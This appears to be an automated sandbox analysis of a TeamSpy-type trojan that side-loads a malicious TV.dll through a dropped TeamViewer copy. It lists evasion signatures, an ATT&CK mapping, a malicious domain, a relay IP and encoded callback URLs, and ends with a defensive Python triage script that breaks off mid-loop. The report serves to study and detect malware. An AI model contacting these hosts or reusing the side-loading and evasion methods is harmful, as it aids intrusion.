Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,
Source: svchost.exe, 00000014.00000002.749355403.00000282E9C72000.00000004.00000001.sdmp | Binary or memory string: $@Hyper-V RAW
Source: TeamViewer.exe, 00000003.00000002.754192652.0000000005790000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.491168196.000001C4950E3000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.747809798.00000282E4429000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: TeamViewer.exe, 00000003.00000003.412988843.0000000000B1C000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWSysWOW64\FirewallControlPanel.dll,-12122!3
Source: svchost.exe, 0000000E.00000002.490833749.000001C4950A9000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW

Anti Debugging:

Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Open window title or class name: ollydbg
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Code function: 1_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F33B510 GetProcessHeap,HeapFree,HeapFree,HeapDestroy,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F33C1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_0051523A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_00534A9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_6F33C1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_6F33C1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

DLL side loading technique detected
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F335130 LogonUserW,GetLastError,CloseHandle,
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F333390 OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,GetProcessHeap,GetProcessHeap,HeapAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,ConvertSidToStringSidA,FreeSid,GetProcessHeap,HeapFree,CloseHandle,
Source: TeamViewer.exe, 00000003.00000002.753868992.0000000003DD0000.00000004.00000001.sdmp | Binary or memory string: Program Manager
Source: TeamViewer.exe, 00000003.00000002.751436078.0000000000FA0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: TeamViewer.exe, 00000003.00000002.751436078.0000000000FA0000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: TeamViewer.exe, 00000003.00000002.751436078.0000000000FA0000.00000002.00020000.sdmp | Binary or memory string: &Program Manager
Source: TeamViewer.exe, 00000003.00000002.751436078.0000000000FA0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWndThumbnailClassDV2ControlHostBaseBarTeamViewer_TitleBarWindowProgmanTVWidgetWin#32771teamviewerdebug.exeteamviewer.exeQuick Connect ButtonStartmenuTaskbarDesktopsidebar.exe\VarFileInfo\Translation\StringFileInfo\%04x%04x\FileDescription.exeOther applicationsSideBar_HTMLHostWindowSideBar_AppBarBulletBasicWindowTVWhiteboardOverlayWindowButtonEnableApplicationSelection: %1% (..\Server\WindowOberserver.cpp, 720)SelectAllWindows: %1%;%2% (..\Server\WindowOberserver.cpp, 751)SetSingleWindow (..\Server\WindowOberserver.cpp, 820)SessionEnded: %1% (..\Server\WindowOberserver.cpp, 827)SessionStart: %1%; type: %2% (..\Server\WindowOberserver.cpp, 910)HandleDesktopChanged: %1% (..\Server\WindowOberserver.cpp, 1017)Winlogonmap/set<T> too long
Source: TeamViewer.exe, 00000003.00000002.753868992.0000000003DD0000.00000004.00000001.sdmp | Binary or memory string: user841675usProgram ManagerC:\Windows\explorer.exe3910722678072
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: GetLocaleInfoA,_xtoa_s@20,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: _LcidFromHexString,GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_0054B459 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Code function: 1_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDList,762AA680,lstrcat,lstrlen,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F338510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_00511D6F __EH_prolog3_catch,_memset,_memset,socket,WSAGetLastError,htonl,inet_addr,htons,WSAGetLastError,bind,bind,WSAGetLastError,Sleep,bind,listen,WSAGetLastError,select,WSAGetLastError,getsockname,WSAGetLastError,Sleep,__WSAFDIsSet,accept,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,WSAGetLastError,Sleep,GetTickCount,__WSAFDIsSet,WSAGetLastError,_strncmp,_strncmp,_strncpy,shutdown,Sleep,listen,Sleep,listen,WSAGetLastError,accept,Sleep,_memset,WSAGetLastError,_memset,select,_strncmp,

Mitre Att&ck Matrix

Techniques are listed per tactic column; the trailing number after a technique is the signature count shown in the original matrix.

Initial Access: Valid Accounts 2; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: Windows Management Instrumentation 11; Native API 1; Service Execution 12; At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
Persistence: DLL Side-Loading 1; DLL Search Order Hijacking 2; Create Account 1; Valid Accounts 2; Windows Service 22; Registry Run Keys / Startup Folder 1; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron
Privilege Escalation: DLL Side-Loading 1; DLL Search Order Hijacking 2; Valid Accounts 2; Access Token Manipulation 21; Windows Service 22; Process Injection 12; Registry Run Keys / Startup Folder 1; Scheduled Task/Job; At (Linux); At (Windows); Cron
Defense Evasion: Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 2; Software Packing 1; DLL Side-Loading 1; DLL Search Order Hijacking 2; Masquerading 12; Valid Accounts 2; Virtualization/Sandbox Evasion 22; Access Token Manipulation 21; Process Injection 12; Right-to-Left Override
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: System Time Discovery 1; Account Discovery 1; File and Directory Discovery 3; System Information Discovery 36; Query Registry 1; Security Software Discovery 451; Virtualization/Sandbox Evasion 22; Process Discovery 2; System Owner/User Discovery 1; Remote System Discovery 1; System Network Configuration Discovery 1
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media
Collection: Archive Collected Data 1; Screen Capture 1; Clipboard Data 1; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol; Exfiltration Over Physical Medium
Command and Control: Ingress Tool Transfer 2; Encrypted Channel 21; Non-Application Layer Protocol 3; Application Layer Protocol 14; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: System Shutdown/Reboot 1; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact; Service Stop

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

[Screenshot thumbnails of the Windows analysis run are not reproduced here.]

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
77Etc0bR2v.exe | 38% | Virustotal |
77Etc0bR2v.exe | 11% | Metadefender |
77Etc0bR2v.exe | 38% | ReversingLabs | Win32.Trojan.Teamspy

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\TeamViewer\TV.dll | 27% | ReversingLabs | Win32.Trojan.SpywareX
C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | 0% | Metadefender |
C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll | 0% | Metadefender |
C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll | 0% | ReversingLabs |

Unpacked PE Files

Source | Detection | Scanner | Label
1.2.77Etc0bR2v.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen2
1.0.77Etc0bR2v.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains

No Antivirus matches

URLs


Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
outnegorave.info | 172.67.205.33 | true | false | - | high
master1.teamviewer.com | 185.188.32.1 | true | false | - | high
ping3.dyngate.com | unknown | unknown | false | - | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001 | false | Avira URL Cloud: safe | unknown
http://master1.teamviewer.com/dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmJubm5wbGZqTJKIemBMmoKGemDwysbMaMTEcsJyYmBovmLIZshiyspkxsjGYG7Mwr5kZmZyYGJwamBuTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyepnqu0txuTKx6YmpcYFxscG5AoqQ== | false | - | high
http://37.252.232.109/din.aspx?s=12852408&m=fast&client=DynGate&p=10000002 | false | Avira URL Cloud: safe | unknown
http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGate | false | Avira URL Cloud: safe | unknown
https://outnegorave.info/B8C631A8/ | false | Avira URL Cloud: safe | unknown
http://master1.teamviewer.com/din.aspx?s=32172965&client=DynGate&p=10000002 | false | - | high
http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001 | false | - | high
http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 | false | - | high
http://master1.teamviewer.com/dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip | false | - | high
http://master1.teamviewer.com/din.aspx?s=32172973&client=DynGate&p=10000002 | false | - | high
http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGate | false | Avira URL Cloud: safe | unknown
http://master1.teamviewer.com/dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAADCARCWdP+8wfzgDovZDWc9KRaNBTKXeqgMryYWfWccXbGfDEfNT+U4KZFEiNZd0zuH/MQ/SRaQNNnjtv84KYe+U040c3/As43/r8ahQdfkk0H9Ix4o0kZbzU7V9NoH0DUbHQEDVFZHq15qjFwADH4MEpxjjsD/4at/ndBEZYFB | false | - | high
http://master1.teamviewer.com/din.aspx?s=32172978&client=DynGate&p=10000002 | false | - | high
http://master1.teamviewer.com/dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAH7JHR8QgtaO7yBL7EyIXekv6NKfS/9saFdKCbGvK+cyECqaxlVV8H0eABNoQ2/lzw1z6YYl5neJbLrah282nr/4Hb+JS5aEuXRLIqpmcd0emf/P4vNdqWqM9q1bNbkmmV2Req6X7tG3LfTWPkLja/ZTELvLqPL88NLfU4qvNBdr | false | - | high
http://master1.teamviewer.com/din.aspx?s=32172969&client=DynGate&p=10000002 | false | - | high
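The Contacted URLs above show the same TeamViewer relay protocol (din.aspx / dout.aspx polling with client=DynGate) being spoken both to master1.teamviewer.com and to the raw IP 37.252.232.109, while the dropped second stage is fetched from outnegorave.info. The following Python is an added triage example, not part of the Joe Sandbox report, that separates those three cases and lists the DynGate session ids (the s= parameter) seen per host. It assumes, for this example only, that TeamViewer's own relay infrastructure lives under teamviewer.com and dyngate.com, so DynGate-style traffic to any other host or to an IP literal is flagged for review; the report itself rates every one of these URLs as non-malicious. The embedded URL list is a subset of the table above with the long base64 data= payloads shortened to their first characters.

```python
import ipaddress
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# Assumption for this example: TeamViewer's relay/master servers are expected
# only under these domains. Anything else speaking the DynGate protocol is
# flagged as an unexpected relay, not declared malicious.
EXPECTED_RELAY_SUFFIXES = (".teamviewer.com", ".dyngate.com")

# Subset of the "Contacted URLs" table above. The base64 "data" payloads are
# truncated because only host, path and query string matter for this triage.
CONTACTED_URLS = [
    "http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001",
    "http://37.252.232.109/din.aspx?s=12852408&m=fast&client=DynGate&p=10000002",
    "http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGate",
    "http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGate",
    "http://master1.teamviewer.com/dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCj",
    "http://master1.teamviewer.com/din.aspx?s=32172965&client=DynGate&p=10000002",
    "http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001",
    "http://master1.teamviewer.com/din.aspx?s=32172973&client=DynGate&p=10000002",
    "https://outnegorave.info/B8C631A8/",
]


def is_dyngate_request(url: str) -> bool:
    """True for the din.aspx / dout.aspx polling endpoints with client=DynGate."""
    parts = urlparse(url)
    endpoint = parts.path.rsplit("/", 1)[-1].lower()
    query = parse_qs(parts.query)
    return endpoint in ("din.aspx", "dout.aspx") and query.get("client") == ["DynGate"]


def is_ip_literal(host: str) -> bool:
    """True when the host part is a bare IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def classify(url: str) -> str:
    """Return 'expected_relay', 'unexpected_relay' or 'other' for one URL."""
    host = (urlparse(url).hostname or "").lower()
    if not is_dyngate_request(url):
        return "other"
    if not is_ip_literal(host) and host.endswith(EXPECTED_RELAY_SUFFIXES):
        return "expected_relay"
    return "unexpected_relay"


def triage(urls):
    """Group hosts by class and collect the DynGate session ids (s=...) seen per host.

    Returns (hosts_by_class, session_ids_by_host), both plain dicts of sets.
    """
    hosts_by_class = defaultdict(set)
    sessions_by_host = defaultdict(set)
    for url in urls:
        parts = urlparse(url)
        host = (parts.hostname or "").lower()
        hosts_by_class[classify(url)].add(host)
        if is_dyngate_request(url):
            for sid in parse_qs(parts.query).get("s", []):
                sessions_by_host[host].add(sid)
    return dict(hosts_by_class), dict(sessions_by_host)


if __name__ == "__main__":
    by_class, by_host = triage(CONTACTED_URLS)
    for label, hosts in sorted(by_class.items()):
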